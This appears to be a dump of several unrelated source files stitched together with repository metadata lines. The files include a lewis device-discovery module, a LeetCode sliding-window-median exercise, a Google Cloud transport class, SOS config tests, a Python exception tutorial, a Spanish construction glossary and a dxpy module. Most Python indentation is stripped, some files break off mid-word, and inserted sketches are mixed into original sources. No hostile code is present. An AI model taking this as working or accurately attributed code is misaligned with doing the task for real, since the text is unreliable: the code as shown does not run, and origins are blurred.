infrastructure that can import devices from a module (:class:`DeviceRegistry`). The latter also
produces factory-like objects that create device instances and interfaces based on setups
(:class:`DeviceBuilder`).
"""
import importlib
from lewis import __version__
from lewis.core.exceptions import LewisException
from lewis.core.logging import has_log
from lewis.core.utils import get_submodules, get_members, is_compatible_with_framework
@has_log
class DeviceBase(object):
"""
This class is a common base for :class:`~lewis.devices.Device` and
:class:`~lewis.devices.StateMachineDevice`. It is mainly used in the device
discovery process.
"""
@has_log
class InterfaceBase(object):
"""
This class is a common base for protocol specific interfaces that are exposed by a subclass of
:class:`~lewis.core.adapters.Adapter`. This base class is not meant to be used directly in
a device package - this is what the interfaces in :mod:`lewis.adapters` are for.
There is a 1:1 correspondence between device and interface, where the interface holds a
reference to the device. It can be changed through the ``device``-property.
"""
protocol = None
def __init__(self):
super(InterfaceBase, self).__init__()
self._device = None
@property
def adapter(self):
"""
Adapter type that is required to process and expose interfaces of this type. Must be
implemented in subclasses.
"""
raise NotImplementedError('An interface type must specify which adapter it is compatible '
'with. Please implement the adapter-property.')
@property
def device(self):
"""
The device this interface is bound to. When a new device is set, :meth:`_bind_device` is
called, where the interface can react to the device change if necessary.
"""
return self._device
@device.setter
def device(self, new_device):
self._device = new_device
self._bind_device()
def _bind_device(self):
"""
This method should perform any binding steps between device and interface. The result
of this binding step is generally used by the adapter to process network traffic.
The default implementation does nothing.
"""
pass
def is_device(obj):
"""
Returns True if obj is a device type (derived from DeviceBase), but not defined in
:mod:`lewis.core.devices` or :mod:`lewis.devices`.
:param obj: Object to test.
:return: True if obj is a device type.
"""
return isinstance(obj, type) and issubclass(
obj, DeviceBase) and obj.__module__ not in ('lewis.devices', 'lewis.core.devices')
def is_interface(obj):
"""
Returns True if obj is an interface (derived from :class:`InterfaceBase`), but not defined in
:mod:`lewis.adapters`, where concrete interfaces for protocols are defined.
:param obj: Object to test.
:return: True if obj is an interface type.
"""
return isinstance(obj, type) and issubclass(
obj, InterfaceBase) and not (
obj.__module__.startswith('lewis.core.devices') or obj.__module__.startswith(
'lewis.adapters'))
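# Illustrative sketch (not part of the lewis sources): a minimal device/interface
# pair that is_device() and is_interface() above would recognize, assuming the
# classes are defined in a device package module rather than inside lewis itself.
class ExampleDevice(DeviceBase):
    """Hypothetical device; is_device(ExampleDevice) would return True."""
    position = 0.0
class ExampleInterface(InterfaceBase):
    """Hypothetical interface; is_interface(ExampleInterface) would return True."""
    protocol = 'example'
    @property
    def adapter(self):
        # A real interface would return a concrete Adapter subclass here.
        return None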
@has_log
class DeviceBuilder(object):
"""
This class takes a module object (for example imported via importlib.import_module or via the
:class:`DeviceRegistry`) and inspects it so that it's possible to construct devices and
interfaces.
In order for the class to work properly, the device module has to adhere to a few rules.
Device types, which means classes inheriting from :class:`DeviceBase`, are imported directly
from the device module, equivalent to the following:
.. sourcecode :: Python
from device_name import SimulatedDeviceType
If ``SimulatedDeviceType`` is defined in the ``__init__.py``, there's nothing else to do. If
the device class is defined elsewhere, it must be imported in the ``__init__.py`` file as
written above. If there is only one device type (which is probably the most common case), it is
    assumed to be the default device type.
Setups are discovered in two locations, the first one is a dict called ``setups`` in the device
module, which must contain setup names as keys and as values again a dict. This inner dict has
one mandatory key called ``device_type`` and one optional key ``parameters`` containing the
constructor arguments for the specified device type:
.. sourcecode:: Python
setups = dict(
broken=dict(
device_type=SimulatedDeviceType,
parameters=dict(
override_initial_state='error',
override_initial_data=dict(
target=-10, position=-20.0))))
The other location is a sub-package called `setups`, which should in turn contain modules. Each
module must contain a variable ``device_type`` and a variable ``parameters`` which are
analogous to the keys in the dict described above. This allows for more complex setups which
define additional classes and so on.
The ``default`` setup is special, it is used when no setup is supplied to
:meth:`create_device`. If the setup ``default`` is not defined, one is created with the default
device type. This has two consequences, no setups need to be defined for very simple devices,
but if multiple device types are defined, a ``default`` setup must be defined.
A setup can be supplied to the :meth:`create_device`.
Lastly, the builder tries to discover device interfaces, which are currently classes based on
:class:`lewis.adapters.InterfaceBase`. These are looked for in the module and in a sub-package
called ``interfaces`` (which should contain modules with adapters like the ``setups`` package).
Each interface has a protocol, if a protocol occurs more than once in a device module,
a RuntimeError is raised.
"""
def __init__(self, module):
self._module = module
submodules = get_submodules(self._module)
self._device_types = self._discover_devices(submodules.get('devices'))
self._setups = self._discover_setups(submodules.get('setups'))
self._interfaces = self._discover_interfaces(submodules.get('interfaces'))
self.log.debug(
'Discovered the following items in \'%s\': Devices: %s; Setups: %s; Interfaces: %s',
self._module.__name__,
', '.join(device_t.__name__ for device_t in self._device_types),
', '.join(self._setups.keys()),
', '.join('(%s: %s)' % (k, v.__name__) for k, v in self._interfaces.items()))
def _discover_devices(self, devices_package):
devices = list(get_members(self._module, is_device).values())
if devices_package is None:
return devices
for module in get_submodules(devices_package).values():
devices += list(get_members(module, is_device).values())
return devices
def _discover_setups(self, setups_package):
setups = getattr(self._module, 'setups', {})
|
JulyKikuAkita/PythonPrac
|
cs15211/SlidingWindowMedian.py
|
Python
|
apache-2.0
| 5,180
| 0.004826
|
__source__ = 'https://leetcode.com/problems/sliding-window-median/'
# Time: O(n*logk)
# Space: O(k)
#
# Description: 480. Sliding Window Median
#
# Median is the middle value in an ordered integer list.
# If the size of the list is even, there is no middle value.
# So the median is the mean of the two middle value.
#
# Examples:
# [2,3,4] , the median is 3
#
# [2,3], the median is (2 + 3) / 2 = 2.5
#
# Given an array nums, there is a sliding window of size k which is moving from the very left of the array
# to the very right. You can only see the k numbers in the window.
# Each time the sliding window moves right by one position.
# Your job is to output the median array for each window in the original array.
#
# For example,
# Given nums = [1,3,-1,-3,5,3,6,7], and k = 3.
#
# Window position Median
# --------------- -----
# [1 3 -1] -3 5 3 6 7 1
# 1 [3 -1 -3] 5 3 6 7 -1
# 1 3 [-1 -3 5] 3 6 7 -1
# 1 3 -1 [-3 5 3] 6 7 3
# 1 3 -1 -3 [5 3 6] 7 5
# 1 3 -1 -3 5 [3 6 7] 6
# Therefore, return the median sliding window as [1,-1,-1,3,5,6].
#
# Note:
# You may assume k is always valid, ie: 1 <= k <= input array's size for non-empty array.
#
# Hide Company Tags Google
# Hide Similar Problems (H) Find Median from Data Stream
#
import unittest
class Solution(object):
pass # your function here
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/sliding-window-median/solution/
TreeMap is used to implement an ordered MultiSet.
Almost the same idea as Find Median from Data Stream:
https://leetcode.com/problems/find-median-from-data-stream/
Use two Heaps to store numbers. maxHeap for numbers smaller than current median,
minHeap for numbers bigger than and equal to current median.
A small trick I used is to always make the size of minHeap equal to (when the
window holds an even number of elements) or one element larger than (when odd)
the size of maxHeap. Then it becomes very easy to calculate the current median.
Keep adding the number entering from the right side of the sliding window,
remove the number leaving from the left side, and keep appending the current
median to the result.
# 82ms 22.97%
class Solution {
public double[] medianSlidingWindow(int[] nums, int k) {
double[] res = new double[nums.length-k+1];
TreeMap<Integer, Integer> minHeap = new TreeMap<Integer, Integer>();
TreeMap<Integer, Integer> maxHeap = new TreeMap<Integer, Integer>(Collections.reverseOrder());
int minHeapCap = k/2; //smaller heap when k is odd.
int maxHeapCap = k - minHeapCap;
for(int i=0; i< k; i++){
maxHeap.put(nums[i], maxHeap.getOrDefault(nums[i], 0) + 1);
}
int[] minHeapSize = new int[]{0};
int[] maxHeapSize = new int[]{k};
for(int i=0; i< minHeapCap; i++){
move1Over(maxHeap, minHeap, maxHeapSize, minHeapSize);
}
res[0] = getMedian(maxHeap, minHeap, maxHeapSize, minHeapSize);
int resIdx = 1;
for(int i=0; i< nums.length-k; i++){
int addee = nums[i+k];
if(addee <= maxHeap.keySet().iterator().next()){
add(addee, maxHeap, maxHeapSize);
} else {
add(addee, minHeap, minHeapSize);
}
int removee = nums[i];
if(removee <= maxHeap.keySet().iterator().next()){
remove(removee, maxHeap, maxHeapSize);
} else {
remove(removee, minHeap, minHeapSize);
}
//rebalance
if(minHeapSize[0] > minHeapCap){
                move1Over(minHeap, maxHeap, minHeapSize, maxHeapSize);
} else if(minHeapSize[0] < minHeapCap){
move1Over(maxHeap, minHeap, maxHeapSize, minHeapSize);
}
res[resIdx] = getMedian(maxHeap, minHeap, maxHeapSize, minHeapSize);
resIdx++;
}
return res;
}
    public double getMedian(TreeMap<Integer, Integer> bigHeap, TreeMap<Integer, Integer> smallHeap, int[] bigHeapSize, int[] smallHeapSize){
return bigHeapSize[0] > smallHeapSize[0] ? (double) bigHeap.keySet().iterator().next() : ((double) bigHeap.keySet().iterator().next() + (double) smallHeap.keySet().iterator().next()) / 2.0;
}
//move the top element of heap1 to heap2
public void move1Over(TreeMap<Integer, Integer> heap1, TreeMap<Integer, Integer> heap2, int[] heap1Size, int[] heap2Size){
int peek = heap1.keySet().iterator().next();
add(peek, heap2, heap2Size);
remove(peek, heap1, heap1Size);
}
public void add(int val, TreeMap<Integer, Integer> heap, int[] heapSize){
heap.put(val, heap.getOrDefault(val,0) + 1);
heapSize[0]++;
}
public void remove(int val, TreeMap<Integer, Integer> heap, int[] heapSize){
if(heap.put(val, heap.get(val) - 1) == 1) heap.remove(val);
heapSize[0]--;
}
}
'''
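# Illustrative Python sketch (not part of the original solution): instead of the
# two-heap approach described above, keep the window in a sorted list maintained
# with bisect; simpler to verify, at O(n*k) instead of O(n*logk).
import bisect
def median_sliding_window(nums, k):
    window = sorted(nums[:k])
    medians = []
    for i in range(k, len(nums) + 1):
        # record the median of the current window
        if k % 2:
            medians.append(float(window[k // 2]))
        else:
            medians.append((window[k // 2 - 1] + window[k // 2]) / 2.0)
        if i == len(nums):
            break
        # slide the window: drop the outgoing element, insert the incoming one
        window.pop(bisect.bisect_left(window, nums[i - k]))
        bisect.insort(window, nums[i])
    return medians
# median_sliding_window([1, 3, -1, -3, 5, 3, 6, 7], 3) == [1.0, -1.0, -1.0, 3.0, 5.0, 6.0]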
|
googleapis/python-data-fusion
|
google/cloud/data_fusion_v1/services/data_fusion/transports/base.py
|
Python
|
apache-2.0
| 8,521
| 0.001291
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import pkg_resources
import google.auth # type: ignore
import google.api_core
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.api_core import operations_v1
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.data_fusion_v1.types import datafusion
from google.longrunning import operations_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-data-fusion",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class DataFusionTransport(abc.ABC):
"""Abstract transport class for DataFusion."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
DEFAULT_HOST: str = "datafusion.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = {"scopes": scopes, "default_scopes": self.AUTH_SCOPES}
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials are service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.list_available_versions: gapic_v1.method.wrap_method(
self.list_available_versions,
default_timeout=None,
client_info=client_info,
),
self.list_instances: gapic_v1.method.wrap_method(
self.list_instances, default_timeout=None, client_info=client_info,
),
self.get_instance: gapic_v1.method.wrap_method(
self.get_instance, default_timeout=None, client_info=client_info,
),
self.create_instance: gapic_v1.method.wrap_method(
self.create_instance, default_timeout=None, client_info=client_info,
),
self.delete_instance: gapic_v1.method.wrap_method(
self.delete_instance, default_timeout=None, client_info=client_info,
),
self.update_instance: gapic_v1.method.wrap_method(
self.update_instance, default_timeout=None, client_info=client_info,
),
self.restart_instance: gapic_v1.method.wrap_method(
self.restart_instance, default_timeout=None, client_info=client_info,
),
}
def close(self):
"""Closes resources associated with the transport.
.. warning::
Only call this method if the transport is NOT shared
with other clients - this may cause errors in other clients!
"""
raise NotImplementedError()
@property
def operations_client(self):
"""Return the client designed to process long-running o
|
perations."""
raise NotImplementedError()
    @property
def list_available_versions(
self,
) -> Callable[
[datafusion.ListAvailableVersionsRequest],
Union[
datafusion.ListAvailableVersionsResponse,
Awaitable[datafusion.ListAvailableVersionsResponse],
],
]:
raise NotImplementedError()
@property
def list_instances(
self,
) -> Callable[
[datafusion.ListInstancesRequest],
Union[
datafusion.ListInstancesResponse,
Awaitable[datafusion.ListInstancesResponse],
],
]:
raise NotImplementedError()
@property
def get_instance(
self,
) -> Callable[
[datafusion.GetInstanceRequest],
Union[datafusion.Instance, Awaitable[datafusion.Instance]],
]:
raise NotImplementedError()
@property
def create_instance(
self,
) -> Callable[
[datafusion.CreateInstanceRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
@property
def delete_instance(
self,
) -> Callable[
[datafusion.DeleteInstanceRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
@property
def update_instance(
self,
) -> Callable[
[datafusion.UpdateInstanceRequest],
Union[operations_pb2.Operation, Awaitable[operati
|
BoPeng/SOS
|
test/test_config.py
|
Python
|
gpl-3.0
| 5,574
| 0
|
#!/usr/bin/env python3
#
# Copyright (c) Bo Peng and the University of Texas MD Anderson Cancer Center
# Distributed under the terms of the 3-clause BSD License.
import os
import getpass
import subprocess
import pytest
from sos import execute_workflow
from sos._version import __version__
from sos.utils import env, load_config_files
from sos.eval import get_config
# if the test is imported under sos/test, test the interactive executor
test_cfg = '''
cut: 0.5
cut1:
- 0.5
- 2
- 3
cut2: a3
cut3:
- a
- b
- c
cut4:
A: 123
me: '{user_name}@my'
'''
def test_command_line():
'''Test command line arguments'''
assert subprocess.call(
'sos config -h',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config -g --get',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config --get',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config -g --set a 5',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config --get a',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
assert subprocess.call(
'sos config -g --unset a',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
def test_config_set(config_factory):
'''Test interpolation of config'''
myconfig = config_factory(test_cfg)
assert subprocess.call(
f'sos config --set cut 0.5 -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut'] == 0.5
#
assert subprocess.call(
        f'sos config --set cut1 0.5 2 3 -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
        shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut1'] == [0.5, 2, 3]
#
assert subprocess.call(
f'sos config --set cut2 a3 -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut2'] == 'a3'
#
assert subprocess.call(
f'sos config --set cut3 a b c -c {myconfig}',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut3'] == ['a', 'b', 'c']
#
assert subprocess.call(
f'''sos config --set cut4 "{{'A': 123}}" -c {myconfig}''',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig)
assert env.sos_dict['CONFIG']['cut4'] == {'A': 123}
def test_interpolate(config_factory):
'''Test interpolation of config'''
myconfig = config_factory(test_cfg)
assert subprocess.call(
f'''sos config --set me '{{user_name}}@my' -c {myconfig}''',
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
shell=True) == 0
load_config_files(myconfig, default_config_files=False)
assert get_config('me') == f'{getpass.getuser().lower()}@my'
def test_global_vars(config_factory):
'''Test SoS defined variables'''
execute_workflow("[0]", options={'mode': 'dryrun'})
assert env.sos_dict['SOS_VERSION'] == __version__
assert isinstance(env.sos_dict['CONFIG'], dict)
cfg = config_factory({'my_config': 5})
execute_workflow("[0]", options={'config_file': cfg})
assert env.sos_dict['CONFIG']['my_config'] == 5
def test_get_config(config_factory):
myconfig = config_factory({
'val': 5,
'A': {
'B.C': '33',
'B.C1': {
'D': '34'
},
'D': '45'
},
'E': {
'F': {
'val': 6,
'val1': 10,
'G': '{val + val1}'
},
'H': '{val}'
},
'O': 'A{nonexisting}',
'X': '{os.environ.get("HOME", "no_home")}'
})
load_config_files(myconfig)
assert get_config('A', 'D') == '45'
assert get_config('A.D') == '45'
assert get_config(['A', 'D']) == '45'
assert get_config(['A', 'D']) == '45'
assert get_config('A.B.C') == '33'
assert get_config('A.B.C1.D') == '34'
assert get_config('A') == {'B.C': '33', 'B.C1': {'D': '34'}, 'D': '45'}
assert get_config('E.F') == {'val': 6, 'val1': 10, 'G': '16'}
assert get_config('E.F', val=7) == {'val': 6, 'val1': 10, 'G': '17'}
assert get_config('E.F', val=7, allowed_keys=['G']) == {'G': '17'}
assert get_config(
'E.F', val=7, val1=20) == {
'val': 6,
'val1': 10,
'G': '27'
}
assert get_config('E.F', {
'val': 8,
'val1': 30
}) == {
'val': 6,
'val1': 10,
'G': '38'
}
assert get_config('E.H', val=7) == '7'
with pytest.raises(ValueError):
get_config('O')
assert get_config('O', nonexisting=7) == 'A7'
assert get_config('X') == os.environ.get("HOME", "no_home")
|
hackerpals/Python-Tutorials
|
Python-Intro-Workshops/Exceptions-handling/try.py
|
Python
|
gpl-3.0
| 890
| 0.001124
|
#!/usr/bin/python3
'''
TRY Exception
SYNTAX
-----------------------------------------------------------------
try:
You do your operations here;
......................
except ExceptionI:
If there is ExceptionI, then execute this block.
except ExceptionII:
If there is ExceptionII, then execute this block.
......................
else:
If there is no exception then execute this block.
'''
# try:
# fh = open("testfile","w")
# fh.write("This is my test file for exception handling!!")
# except IOError:
# print("Error: can\'t find file or read data")
# else:
# print("Written content in the file successfully")
# fh.close()
try:
fh = open("testfile","r")
fh.write("This is my test file for exception handling!!")
except IOError:
print("Error: cant\'t find file or read data")
else:
print("Written content in the file successfully")
|
mrmuxl/keops
|
keops/modules/project/models.py
|
Python
|
agpl-3.0
| 832
| 0
|
from django.utils.translation import ugettext_lazy as _
from keops.db import models
STATUS = (
('draft', _('Draft')),
('open', _('In Progress')),
('pending', _('Pending')),
    ('done', _('Done')),
('cancelled', _('Cancelled'))
)
class Category(models.Model):
name = models.CharField(null=False, unique=True)
class TaskType(models.Model):
name = models.CharField(unique=True, null=False)
description = models.TextField()
status = models.CharField(max_length=16, choices=STATUS)
class Meta:
db_table = 'project_task_type'
class Project(models.Model):
manager = models.ForeignKey('base.User')
class Task(models.Model):
name = models.CharField(max_length=128, db_index=True)
description = models.TextField()
status = models.CharField(max_length=16, choices=STATUS)
|
openstack/networking-nec
|
networking_nec/nwa/common/constants.py
|
Python
|
apache-2.0
| 877
| 0
|
# Copyright 2015-2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
NWA_DEVICE_GDV = "GeneralDev"
NWA_DEVICE_TFW = "TenantFW"
NWA_AGENT_TOPIC = 'nwa_agent'
NWA_AGENT_TYPE = 'NEC NWA Agent'
NWA_FIREWALL_PLUGIN = 'NECNWAFWaaS'
# Size increment to add to the green pool when its remaining size reaches zero.
NWA_GREENPOOL_ADD_SIZE = 32
|
Ale-/grrr.tools
|
apps/views/glossary.py
|
Python
|
gpl-3.0
| 9,637
| 0.010611
|
from django.utils.translation import ugettext_lazy as _
def get():
""" Site glossary. """
return {
'construction' : [
{
'term' : _('Bienes'),
'text' : _('Objetos o cosas susceptibles de apropiación (art. 333 CC). Los bienes son de domino público o de propiedad privada (art. 338 CC).'),
},
{
'term' : _('Cesión'),
'text' : _('Renuncia de una posesión, acción o derecho a favor de otra persona. (art. 460.2 CC)'),
},
{
'term' : _('Código LER'),
'text' : _('Códigos de clasificación de residuos que utiliza la Unión Europea en la elaboración de la lista europea de residuos publicada en el BOE No 43, de 19 de Febrero de 2002 y corregida en el BOE 61, de 12 de marzo del 2002.'),
},
{
'term' : _('Derribo'),
'text' : _('Destrucción deliberada de elementos verticales, muros o edificios.'),
},
{
'term' : _('Desconstrucción'),
'text' : _('Proceso que contiene los siguientes subprocesos: descontaminación, desmontaje, demolición, valorización en la obra, reciclaje de RCD.'),
},
{
'term' : _('Demolición'),
'text' : _('Eliminar de manera controlada una estructura o una parte de esta. Es la combinación de derribo y desmontaje controlado con el fin de eliminar un edificio o parte de este. A diferencia del derribo, la demolición es Segura, Controlada, Selectiva y Precisa.'),
},
{
'term' : _('Descontaminación'),
'text' : _('Eliminación del edificio a demoler la sustancia o sustancias que contaminan o pueden contaminar el medio.'),
},
{
'term' : _('Desmontaje'),
'text' : _('Operación de separar las partes o las piezas, que forman un todo.'),
},
{
'term' : _('Entidades locales'),
'text' : _('Son Entidades Locales o Administraciones públicas de carácter territorial local: El Municipio, la Provincia y la Isla (en los archipiélagos balear y canario), (art. 1.2 LBRL).'),
},
{
'term' : _('Entidad privada sin ánimo de lucro'),
'text' : _('Entidad cuyo fin no es la consecución de un beneficio económico. Suelen tener la figura jurídica de asociación, fundación, mutualidad o cooperativa (las cooperativas pueden tener o carecer de ánimo de lucro), y donde el eventual excedente de su actividad se reinvierte en los fines que tiene por objeto en sus estatutos.'),
},
{
'term' : _('Municipio'),
            'text' : _('Entidad local básica de la organización territorial del estado y cauce inmediato de participación ciudadana en los asuntos públicos, que institucionaliza y gestiona con autonomía los intereses propios de las correspondientes colectividades (art. 1.1 LBRL).'),
},
{
'term' : _('Oneroso'),
'text' : _('No gratuito, que exige alguna contraprestación.'),
},
{
'term' : _('Valorización'),
'text' : _('Proceso para volver a hacer útil un residuo o un componente de un residuo.'),
},
{
'term' : _('RCD'),
            'text' : _('Residuo producto de una construcción o demolición.'),
},
{
'term' : _('Reutilizar'),
'text' : _('Emplear de manera útil un material simple o compuesto, utilizado anteriormente, con posibilidades de cambiar su uso, sus características o su ubicación.'),
},
{
'term' : _('Reciclar'),
'text' : _('Procesar un material para ser reutilizado, no necesariamente en su forma original.'),
},
{
'term' : _('Recurso'),
'text' : _('Conjunto de elementos disponibles para resolver una necesidad.'),
},
{
'term' : _('Residuo'),
'text' : _('Aquéllo que resta de un todo después de sustraer una o más partes. Aquello que resulta de la descomposición o destrucción de algo.'),
},
{
'term' : _('Residuo primario'),
'text' : _('Residuo antes de estudiar las posibilidades que ofrece de tratamiento para dejar de ser un residuo.'),
},
{
'term' : _('Subproducto'),
'text' : _('Residuos que se pueden utilizar directamente como primeras materias otras producciones o como sustituto de productos comerciales y que son recuperables sin necesidad de someterlos a operaciones de tratamiento.'),
},
],
'commons' : [
{
'term' : _('Bienes comunes urbanos'),
'text' : _('aquellos bienes materiales, inmateriales y/o digitales, que los Ciudadanos y la Administración, incluidos aquellos realizados a través de procedimientos participativos y deliberativos, reconocen como funcionales para el bienestar individual y colectivo.'),
},
{
'term' : _('Ciudadanos activos'),
'text' : _('Todos los sujetos, individuos, asociaciones o cualquier otro colectivo, también en forma de negocio u organización social, que actúen en favor del cuidado y regeneración de los bienes comunes urbanos.'),
},
{
'term' : _('Propuesta de colaboración'),
'text' : _('La manifestación de interés, formulada por los ciudadanos activos, cuya finalidad es la intervención de cuidado y regeneración de los bienes comunes urbanos. La propuesta puede ser espontánea o en respuesta a una solicitud formulada por el Ayuntamiento.'),
},
{
'term' : _('Acuerdo de colaboración'),
'text' : _('El pacto a través del cual el Ayuntamiento o la entidad privada y los ciudadanos activos definen el alcance de las intervenciones de cuidado y regeneración de los bienes comunes urbanos.'),
},
{
'term' : _('Intervenciones de cuidado'),
            'text' : _('Intervenciones orientadas a la protección, conservación y mantenimiento de los bienes comunes urbanos para garantizar y mejorar su facilidad de uso y calidad.'),
},
{
'term' : _('Gestión compartida'),
'text' : _('Aquellas intervenciones de cuidado de bienes comunes urbanos realizadas conjuntamente por los Ciudadanos y la Administración con carácter de continuidad e inclusión.'),
},
{
'term' : _('Intervenciones de regeneración'),
'text' : _('Trabajos de restauración, transformación e innovación de los bienes comunes, realizados a través de métodos de co-diseño e integrados con procesos sociales, económicos, tecnológicos y ambientales, que en su conjunto tienen un impacto en la mejora de la calidad de vida del ciudadano.'),
},
{
'term' : _('Espacios públicos'),
'text' : _('Zonas verdes, plazas, calles, aceras y otros espacios públicos o abiertos al público, de propiedad o de uso público.'),
},
{
'term' : _('Confianza mutua'),
'text' : _('Sin perjuicio de las prerrogativas de supervisión pública, planificación y verificación, la Administración y los ciudadanos activos abordarán su relación desde la confianza mutua y asumiendo que la respectiva cooperación voluntaria se orienta a la consecución de fines de interés general.'),
},
{
'term' : _('Publicidad y transparencia'),
'text' : _('La administración garantizará la máxima difusión de oportunidades de colaboración, propuestas recibidas, ayudas conce
|
johnwallace123/dx-toolkit
|
src/python/dxpy/bindings/dxapp.py
|
Python
|
apache-2.0
| 15,467
| 0.002069
|
# Copyright (C) 2013-2016 DNAnexus, Inc.
#
# This file is part of dx-toolkit (DNAnexus platform client libraries).
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
DXApp Handler
+++++++++++++
Apps allow for application logic to be distributed to users in the
system, and they allow for analyses to be run in a reproducible and
composable way.
Apps extend the functionality of applets to require input/output
specifications as well as to allow for versioning, collaborative
development, and policies for billing and data access. Similarly to
applets, apps can be run by calling their
:meth:`~dxpy.bindings.dxapp.DXApp.run` method.
Unlike applets, apps are not data objects and do not live in projects.
Instead, they share a single global namespace. An app may have multiple
different versions (e.g. "1.0.0", "1.0.1", etc.) associated with a
single name (which is of the form "app-APPNAME"). A particular version
of an app may be identified in two ways, either by specifying a
combination of its name and a version (or a *tag*), or by specifying its
unique identifier.
Each app has a list of developers, which are the users that are
authorized to publish new versions of an app; perform administrative
tasks, such as assigning categories, and attaching new tags to versions
of the app; and add or remove other developers. When the first version
of an app with a given name is created, the creating user initially
becomes the sole developer of the app.
"""
from __future__ import print_function, unicode_literals, division, absolute_import
import dxpy
from . import DXObject, DXExecutable, DXJob, verify_string_dxid
from ..exceptions import DXError
from ..compat import basestring
#########
# DXApp #
#########
_app_required_keys = ['name', 'title', 'summary', 'dxapi', 'openSource',
'version', 'inputSpec', 'outputSpec', 'runSpec',
'developers', 'authorizedUsers']
